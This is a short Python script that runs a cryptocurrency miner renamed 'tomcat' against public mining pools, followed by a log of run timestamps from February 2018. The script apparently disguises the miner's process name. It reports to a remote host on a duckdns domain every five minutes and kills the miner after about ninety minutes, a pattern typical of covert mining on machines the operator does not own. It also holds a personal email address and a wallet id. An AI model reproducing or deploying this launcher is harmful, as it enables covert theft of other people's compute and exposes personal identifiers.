import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:44:04.903163
#2018-02-17 17:33:06.861897
#2018-02-17 19:21:06.139035
#2018-02-17 21:12:04.176320
#2018-02-17 22:56:05.954856
#2018-02-18 00:43:07.417978
#2018-02-18 02:33:01.253107
#2018-02-18 04:20:01.749473
#2018-02-18 06:11:01.964922
#2018-02-18 08:00:05.475891
#2018-02-18 09:48:03.877055
#2018-02-18 11:35:08.013484
#2018-02-18 13:21:01.638441
#2018-02-18 15:11:05.367264
#2018-02-18 16:59:05.710258
#2018-02-18 18:46:04.937659
#2018-02-18 20:33:06.134939
#2018-02-18 22:18:07.565816
#2018-02-19 00:07:06.859243
#2018-02-19 01:53:02.143935
#2018-02-19 03:40:08.425547
#2018-02-19 05:25:06.168340
#2018-02-19 07:12:07.289413
#2018-02-19 09:01:06.609116
#2018-02-19 10:50:09.819979
#2018-02-19 12:38:07.447057
#2018-02-19 14:27:04.708336
#2018-02-19 16:16:05.018759
#2018-02-19 18:02:09.673398
#2018-02-19 19:49:06.032431
#2018-02-19 21:37:01.781647
#2018-02-19 23:23:05.407388
#2018-02-20 01:09:04.349901
#2018-02-20 02:58:01.328440
#2018-02-20 04:46:01.619738
#2018-02-20 06:30:06.448291
#2018-02-20 08:15:05.666553
#2018-02-20 10:01:05.193837
#2018-02-20 11:45:06.087020
#2018-02-20 13:34:07.975028
#2018-02-20 15:17:01.495975
#2018-02-20 17:02:09.414985
#2018-02-20 18:49:07.285097
#2018-02-20 20:40:04.110905
#2018-02-20 22:26:06.962758
#2018-02-21 00:08:05.000889
#2018-02-21 01:55:07.568602
#2018-02-21 03:43:04.316928
#2018-02-21 05:32:06.224144
#2018-02-21 07:21:03.708579
#2018-02-21 09:06:03.771148
#2018-02-21 10:54:09.664975
#2018-02-21 12:41:08.898072
#2018-02-21 14:28:09.762112
#2018-02-21 16:13:03.039230
#2018-02-21 18:03:08.802440
#2018-02-21 19:50:09.735645
#2018-02-21 21:38:05.830153
#2018-02-21 23:26:01.671641
#2018-02-22 01:16:07.340523
#2018-02-22 03:05:07.132572
#2018-02-22 04:51:03.920603
#2018-02-22 06:36:07.495459
#2018-02-22 08:24:04.091832
#2018-02-22 10:12:05.870027
#2018-02-22 11:56:03.892043
#2018-02-22 13:41:07.484237
#2018-02-22 15:30:11.581287
#2018-02-22 17:17:01.675225
#2018-02-22 19:06:06.836028
#2018-02-22 20:57:07.183486
#2018-02-22 22:42:08.036034
#2018-02-23 00:28:07.469973
#2018-02-23 02:14:04.876200
#2018-02-23 04:01:01.712541
#2018-02-23 05:47:02.084331
#2018-02-23 07:29:07.637178
#2018-02-23 09:34:05.155265
#2018-02-23 11:39:08.413589
#2018-02-23 13:29:01.506916
#2018-02-23 15:16:07.379746
#2018-02-23 17:04:07.822407
#2018-02-23 18:53:09.805011
#2018-02-23 20:41:06.325168
#2018-02-23 22:27:07.439666
#2018-02-24 00:12:07.401450
#2018-02-24 02:05:06.886741
#2018-02-24 03:37:03.641174
#2018-02-24 05:10:01.990898
#2018-02-24 06:43:01.342643
#2018-02-24 08:18:07.720315
#2018-02-24 09:48:05.044883
#2018-02-24 11:33:05.307349
#2018-02-24 12:59:06.959763
#2018-02-24 14:33:01.649109
#2018-02-24 16:02:05.649162
#2018-02-24 17:37:07.284846
#2018-02-24 19:12:07.279504
#2018-02-24 20:46:05.023548
#2018-02-24 22:31:06.564081
#2018-02-25 02:23:06.084084
#2018-02-25 05:54:05.191793
#2018-02-25 11:38:07.473522